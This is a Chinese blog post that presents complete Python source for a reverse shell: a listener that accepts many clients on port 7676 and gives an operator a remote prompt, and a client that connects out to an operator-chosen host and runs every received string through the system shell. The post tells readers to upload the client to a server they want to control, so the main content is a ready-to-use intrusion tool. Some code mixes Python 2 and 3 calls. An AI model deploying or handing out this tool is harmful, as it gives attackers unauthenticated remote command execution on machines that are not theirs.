一个python的反连shell


服务端代码

在有公网 IP 的主机上启动服务端(server),默认在所有网卡(0.0.0.0)上监听 7676 端口,可同时接受多个客户端(client)的连接。连接既不做身份认证也不加密,命令和输出均以明文 UTF-8 传输。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import threading

# Module-level state shared between the accept thread and the operator console.
clientList = [] # (socket, address) tuples, one per accepted connection
curClient = None # the (socket, address) entry currently selected by the operator
quitThread = False # flag polled by the accept loop in wait_connect
lock = threading.Lock() # held while wait_connect appends to clientList

def shell_ctrl(socket,addr):
    """Run the operator console for one connected client.

    Each line typed at the prompt is sent to the client as UTF-8, and up to
    1024 bytes of reply are read back and printed. Two console commands are
    handled locally instead of being forwarded:

    * ``!ch`` -- call select_client() and return to the caller.
    * ``!q``  -- print the closing banner and call exit(0).

    The channel carries no authentication and no encryption: commands and
    output cross the network as plain UTF-8 text, so both are visible to
    network monitoring on the path.

    Args:
        socket: connected socket object for the selected client (the name
            shadows the ``socket`` module inside this function).
        addr: peer address tuple; ``addr[0]`` is shown in the prompt.
    """
    prompt = str(addr[0]) + ':~#'
    while True:
        line = raw_input(prompt)
        if line == '!ch':
            select_client()
            return
        elif line == '!q':
            # No ``global`` statement here, so this binds a local name; the
            # module-level flag read by wait_connect is left unchanged.
            quitThread = True
            print('-----------------------* Connection has ended *--------------------------')
            exit(0)
        socket.send(line.encode('utf-8'))
        # A single recv of at most 1024 bytes; longer replies are not
        # reassembled here.
        reply = socket.recv(1024)
        print(reply.decode('utf-8'))

def select_client():
    """Prompt the operator to pick one entry of clientList as curClient.

    Prints the index and peer IP of every connected client, then keeps
    asking for an index until the number entered is below the list length.
    The chosen (socket, address) tuple is stored in the module-level
    ``curClient`` and a banner with its IP is printed.

    Only the upper bound of the index is checked; the input is passed to
    int() as typed.
    """
    global clientList
    global curClient
    print('--------------* The current is connected to the client: *----------------')
    for idx in range(len(clientList)):
        peer_ip = clientList[idx][1][0]
        print('[%i]-> %s' % (idx, str(peer_ip)))
    print('Please select a client!')

    while True:
        choice = raw_input('client num:')
        if int(choice) < len(clientList):
            break
        print('Please input a correct num!')

    curClient = clientList[int(choice)]

    rule = '=' * 80
    print(rule)
    print(' ' * 20 + 'Client Shell from addr:', curClient[1][0])
    print(rule)

def wait_connect(sk):
    """Accept inbound connections on *sk* and record them in clientList.

    Runs until the module-level ``quitThread`` flag is true when the loop
    condition is re-checked (accept() blocks in between). Every connection
    is accepted unconditionally: no allow-list, handshake or credential
    check is applied before the peer is added to the list.

    Args:
        sk: a bound, listening TCP socket.
    """
    global clientList
    while not quitThread:
        if not clientList:
            print('Waiting for the connection......')
        conn, peer = sk.accept()
        print('New client %s is connection!' % (peer[0]))
        # Appends are serialized with the module lock; readers elsewhere in
        # the file do not take it.
        with lock:
            clientList.append((conn, peer))

def main():
    """Start the listener and drive the operator console.

    Binds a TCP socket to 0.0.0.0:7676 (all interfaces), starts
    wait_connect in a background thread, and then loops forever: whenever
    at least one client is connected it asks the operator to choose one and
    hands that client's socket and address to shell_ctrl.

    The outer loop does not sleep, so it spins while no client is connected.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(('0.0.0.0',7676))
    listener.listen(1024)

    acceptor = threading.Thread(target=wait_connect,args=(listener,))
    acceptor.start()

    while True:
        if not clientList:
            continue
        select_client()  # pick one client
        shell_ctrl(curClient[0],curClient[1])  # run the console for it

# Start the listener only when the file is executed as a script, not on import.
if __name__ == '__main__':
    main()

客户端代码

将这个脚本上传到要控制的服务器上,执行
python client.py -H yourserverIP -p port

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import socket
import subprocess
import argparse
import sys
import time
import threading

def connectHost(ht,pt):
    """Connect out to ht:pt and execute every received message as a shell command.

    Observable behaviour, as written: the Python process opens an outbound
    TCP connection, then for each message of up to 1024 bytes it spawns a
    child through the system shell (``shell=True``) and sends the child's
    stdout back over the same socket as UTF-8. stderr is captured but never
    sent. Nothing on the channel is authenticated or encrypted, so whatever
    the peer sends is run with the privileges of this process, and both
    commands and output are readable on the wire.

    Args:
        ht: host name or IP to connect to.
        pt: port; converted with int().
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ht,int(pt)))
    while True:
        data = sock.recv(1024)
        data = data.decode('utf-8')
        # The received text is handed to the shell unmodified.
        comRst = subprocess.Popen(data,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        m_stdout, m_stderr = comRst.communicate()
        # Re-encode from the local filesystem encoding to UTF-8 for the wire;
        # m_stderr is not used.
        sock.send(m_stdout.decode(sys.getfilesystemencoding()).encode('utf-8'))
        # NOTE(review): the page lost its indentation; the sleep is assumed to
        # sit inside the loop -- confirm against the original file.
        time.sleep(1)
    # Under that reading the loop has no break, so this line is never reached.
    sock.close()

def main():
    """Parse ``-H`` (host) and ``-p`` (port) and hand them to connectHost.

    When both options are missing, the help text is requested through
    ``parse_args(['-h'])``; argparse prints the help and exits on its own at
    that point, so the surrounding print() and exit(0) are not reached. If
    only one of the two options is missing, the None value is passed on to
    connectHost unchanged.
    """
    parser = argparse.ArgumentParser()  # command-line argument parser
    parser.add_argument('-H',dest='hostName',help='Host Name')
    parser.add_argument('-p',dest='conPort',help='Host Port')

    opts = parser.parse_args()  # parse the command line
    host, port = opts.hostName, opts.conPort

    if host is None and port is None:
        print(parser.parse_args(['-h']))
        exit(0)

    connectHost(host,port)  # connect to the controlling side

# Run the client only when the file is executed as a script, not on import.
if __name__ == '__main__':
    main()
------ 本文结束 ------

本文标题:一个python的反连shell

文章作者:ApiCoder

发布时间:2019年07月09日 - 23:07

最后更新:2019年07月25日 - 01:07

原始链接:http://www.safeinfo.me/2019/07/09/一个python的反连shell.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。
